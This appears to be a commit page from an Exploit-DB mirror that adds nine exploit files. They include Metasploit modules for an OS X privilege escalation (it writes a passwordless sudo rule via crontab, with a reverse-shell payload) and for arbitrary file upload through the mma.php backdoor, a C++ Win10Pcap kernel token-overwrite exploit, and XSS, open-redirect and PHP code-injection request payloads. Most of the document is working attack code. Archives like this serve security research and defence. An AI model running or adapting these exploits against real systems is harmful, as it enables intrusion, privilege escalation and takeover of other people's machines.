bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-28

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-10-28 05:03:06 +00:00
parent d0e0fe5941
commit 8a009f2fce
10 changed files with 615 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -34686,6 +34686,8 @@ id,file,description,date,author,platform,type,port
38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery Vulnerability",2013-03-19,m3tamantra,php,webapps,0
38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 'returnTo' Parameter Open Redirection Vulnerability",2013-05-27,"Chokri Ben Achor",hardware,remote,0
38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting Vulnerability",2013-05-27,k3170makan,php,webapps,0
38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - CSRF Vulnerabilities",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
@ -34810,3 +34812,10 @@ id,file,description,date,author,platform,type,port
38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0
38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0
38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80
38542,platforms/windows/dos/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,dos,0
38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0
38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0
38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0

Can't render this file because it is too large.

11
platforms/hardware/remote/38536.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/60172/info
Barracuda SSL VPN 680 is prone to an open-redirection vulnerability.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affected.
https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do
https://www.exmaple.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com
https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]

16
platforms/multiple/dos/38538.py Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/60208/info
Code::Blocks is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
Code::Blocks 12.11 is vulnerable; other versions may also be affected.
#!/usr/bin/python
filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

215
platforms/osx/local/38540.rb Executable file
View file

@ -0,0 +1,215 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
'Description' => %q{
This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
Makes sudo require no password, giving access to su even if root is disabled.
Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
},
'Author' => [
'rebel', # Vulnerability discovery and PoC
'shandelman116' # Copy/paste AND translator monkey
],
'References' => [
['EDB', '38371'],
['CVE', '2015-5889']
],
'DisclosureDate' => 'Oct 1 2015',
'License' => MSF_LICENSE,
# Want to ensure that this can be used on Python Meterpreter sessions as well
'Platform' => ['osx', 'python'],
'Arch' => [ARCH_X86_64, ARCH_PYTHON],
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Targets' => [
['Mac OS X 10.9.5-10.10.5', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp'
}
))
register_options(
[
OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
], self.class
)
end
def exploit
# Check OS
os_check
# Check if crontab file existed already so it can be restored at cleanup
if file_exist? "/etc/crontab"
@crontab_original = read_file("/etc/crontab")
else
@crontab_original = nil
end
# Writing payload
if payload.arch.include? ARCH_X86_64
vprint_status("Writing payload to #{payload_file}.")
write_file(payload_file, payload_source)
vprint_status("Finished writing payload file.")
register_file_for_cleanup(payload_file)
elsif payload.arch.include? ARCH_PYTHON
vprint_status("No need to write payload. Will simply execute after exploit")
vprint_status("Payload encodeded is #{payload.encoded}")
end
# Run exploit
sploit
# Execute payload
print_status('Executing payload...')
if payload.arch.include? ARCH_X86_64
cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
elsif payload.arch.include? ARCH_PYTHON
cmd_exec("python -c \"#{payload.encoded}\" & disown")
end
vprint_status("Finished executing payload.")
end
def os_check
# Get sysinfo
sysinfo = get_sysinfo
# Make sure its OS X (Darwin)
unless sysinfo["Kernel"].include? "Darwin"
print_warning("The target system does not appear to be running OS X!")
print_warning("Kernel information: #{sysinfo['Kernel']}")
return
end
# Make sure its not greater than 10.5 or less than 9.5
version = sysinfo["ProductVersion"]
minor_version = version[3...version.length].to_f
unless minor_version >= 9.5 && minor_version <= 10.5
print_warning("The target version of OS X does not appear to be compatible with the exploit!")
print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
end
end
def sploit
user = cmd_exec("whoami").chomp
vprint_status("The current effective user is #{user}. Starting the sploit")
# Get size of sudoers file
sudoer_path = "/etc/sudoers"
size = get_stat_size(sudoer_path)
# Set up the environment and command for spawning rsh and writing to crontab file
rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
rb_cmd = "ruby -e '#{rb_script}'"
# Attempt to execute
print_status("Attempting to write /etc/crontab...")
cmd_exec(rb_cmd)
vprint_status("Now to check whether the script worked...")
# Check whether it worked
crontab = cmd_exec("cat /etc/crontab")
vprint_status("Reading crontab yielded the following response: #{crontab}")
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
vprint_error("Bad news... it did not write to the file.")
fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
end
print_good("Succesfully wrote to crontab file!")
# Wait for sudoers to change
new_size = get_stat_size(sudoer_path)
print_status("Waiting for sudoers file to change...")
# Start timeout block
begin
Timeout.timeout(datastore['WaitTime']) {
while new_size <= size
Rex.sleep(1)
new_size = get_stat_size(sudoer_path)
end
}
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
end
print_good("Sudoers file has changed!")
# Confirming root access
print_status("Attempting to start root shell...")
cmd_exec("sudo -s su")
user = cmd_exec("whoami")
unless user.include? "root"
fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
end
print_good("Success! Acquired root access!")
end
def get_stat_size(file_path)
cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
response = cmd_exec(cmd)
vprint_status("Response to stat size query is #{response}")
begin
size = Integer(response)
return size
rescue ArgumentError
fail_with(Failure::UnexpectedReply, "Could not get stat size!")
end
end
def payload_source
if payload.arch.include? ARCH_X86_64
return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
elsif payload.arch.include? ARCH_PYTHON
return payload.encoded
end
end
def payload_file
@payload_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
def cleanup
vprint_status("Starting the cron restore process...")
super
# Restore crontab back to is original state
# If we don't do this, then cron will continue to append the no password rule to sudoers.
if @crontab_original.nil?
# Erase crontab file and kill cron process since it did not exist before
vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
if rm_ret.chomp.to_i == 0
vprint_good("Successfully removed crontab file!")
else
print_warning("Could not remove crontab file.")
end
Rex.sleep(1)
kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
if kill_ret.chomp.to_i == 0
vprint_good("Succesfully killed cron!")
else
print_warning("Could not kill cron process.")
end
else
# Write back the original content of crontab
vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
end
vprint_status("Finished the cleanup process.")
end
end

111
platforms/php/remote/38541.rb Executable file
View file

@ -0,0 +1,111 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
'Description' => %q{
This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
operating system version because of the php_uname() function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jay Turla <@shipcod3>',
],
'References' =>
[
['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
],
'Privileged' => false,
'Payload' =>
{
'Space' => 10000,
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['mma file uploader', {} ]
],
'DisclosureDate' => 'Apr 2 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
end
def has_input_name?(nodes, name)
nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
end
def check
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res
n = ::Nokogiri::HTML(res.body)
form = n.at('form[@id="uploader"]')
inputs = form.search('input')
if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
payload_name = "#{rand_text_alpha(5)}.php"
print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
data = Rex::MIME::Message.new
data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.body =~ /uplod d0n3 in SAME file/
print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
register_files_for_cleanup(payload_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Connection Timed Out')
end
send_request_cgi({
'uri' => normalize_uri(payload_name),
'method' => 'GET'
})
end
end

9
platforms/php/webapps/38537.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/60198/info
ADIF Log Search widget plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ADIF Log Search 1.0e is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>

22
platforms/php/webapps/38543.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/60257/info
php4dvd is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
php4dvd 2.0 is vulnerable; other versions may also be affected.
POST /php4dvd/install/?go=configuration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/php4dvd/install/?go=configuration
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=9bucpus4ag68733h2fjpm190p0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
dbhost=localhost&dbport=3306;phpinfo()&dbname=php4dvd&dbuser=root&dbpass=myP@ssw0rd&url=php4dvd&template=default&defaultlanguage=en_US&submit=Next

8
platforms/php/webapps/38544.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/60262/info
Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>

9
platforms/php/webapps/38545.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/60288/info
Telaen is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to Telaen 1.3.1 are vulnerable.
http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script>

205
platforms/windows/dos/38542.cpp Executable file
View file

@ -0,0 +1,205 @@
# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
/*
Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
*/
#include <stdio.h>
#include <tchar.h>
#include<Windows.h>
#include<stdio.h>
#include <winternl.h>
#include <intrin.h>
#include <psapi.h>
#include <strsafe.h>
#include <assert.h>
#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
/* found with :
!token
1: kd> dt nt!_OBJECT_HEADER
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : UChar
+0x00d TraceFlags : UChar
+0x00e InfoMask : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
TypeIndex is 0x5
*/
#define HANDLE_TYPE_TOKEN 0x5
// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
(SYSTEM_INFORMATION_CLASS)16;
// The NtQuerySystemInformation function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
// Undocumented structure: SYSTEM_HANDLE_INFORMATION
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
const FILE_INFORMATION_CLASS FileNameInformation =
(FILE_INFORMATION_CLASS)9;
// The NtQueryInformationFile function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
// FILE_NAME_INFORMATION contains name of queried file object.
typedef struct _FILE_NAME_INFORMATION {
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
void* FindTokenAddressHandles(ULONG pid)
{
/////////////////////////////////////////////////////////////////////////
// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
//
// The functions have no associated import library. You must use the
// LoadLibrary and GetProcAddress functions to dynamically link to
// ntdll.dll.
HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
assert(hNtDll != NULL);
PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
"NtQuerySystemInformation");
assert(NtQuerySystemInformation != NULL);
/////////////////////////////////////////////////////////////////////////
// Get system handle information.
//
DWORD nSize = 4096, nReturn;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
HeapAlloc(GetProcessHeap(), 0, nSize);
// NtQuerySystemInformation does not return the correct required buffer
// size if the buffer passed is too small. Instead you must call the
// function while increasing the buffer size until the function no longer
// returns STATUS_INFO_LENGTH_MISMATCH.
while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
nSize += 4096;
pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
GetProcessHeap(), 0, nSize);
}
for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
{
printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
return pHandle->Object;
}
}
/////////////////////////////////////////////////////////////////////////
// Clean up.
//
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return 0;
}
void main()
{
DWORD dwBytesReturned;
DWORD ShellcodeFakeMemory;
HANDLE token;
// first create toke handle so find object address with handle
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
DebugBreak();
void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
CloseHandle(token);
// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hDriver!=INVALID_HANDLE_VALUE)
{
fprintf(stderr," Open Driver OK\n");
if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
{
fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
return;
}
else fprintf(stderr," Send IOCTL OK\n");
}
else
{
fprintf(stderr," Open Driver error %d.\n",GetLastError());
return;
}
CloseHandle(hDriver);
getchar();
}